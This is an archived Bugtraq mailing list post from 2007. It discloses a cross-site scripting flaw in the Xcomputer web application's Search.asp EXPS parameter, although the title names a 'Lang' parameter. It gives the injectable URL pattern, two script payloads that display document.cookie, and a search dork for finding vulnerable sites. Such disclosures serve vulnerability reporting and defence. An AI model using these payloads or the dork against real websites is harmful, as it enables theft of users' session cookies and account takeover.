Bugtraq mailing list archives

Xcomputer - Lang Parameter Cross-Site Scripting Vulnerability

From: jose luis góngora fernández <sys-project () hotmail com>
Date: Mon, 15 Oct 2007 21:21:01 +0000

# Xcomputer - Lang Parameter Cross-Site Scripting Vulnerability
# Download:
# http://www.xcomputer.cz/
# Bug found by JosS / Jose Luis Góngora Fernández
# Contact: sys-project[at]hotmail.com
# Spanish Hackers Team
# www.spanish-hackers.com
# /server irc.freenode.net /join #fullsecure
# d0rk: "power by xcomputer.cz"
# Stop lammer

# Exploit In (XSS):

http://www.example.com/Search.asp?EXPS=[XSS]
....

# Cross Siting Scripting (Code):

"><script>alert(document.cookie)</script>
<script>alert(document.cookie)</script>

//---------------------------------------\\

Greetz To: All Hackers
JosS! / Jose Luis Góngora Fernández

_________________________________________________________________

Descubre la descarga digital con MSN Music. Más de un millón de canciones.http://music.msn.es/

Current thread:

Xcomputer - Lang Parameter Cross-Site Scripting Vulnerability jose luis góngora fernández (Oct 15)